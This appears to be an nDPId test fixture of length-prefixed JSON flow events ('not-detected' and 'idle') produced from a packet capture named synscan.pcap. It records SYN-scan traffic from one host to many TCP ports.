-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 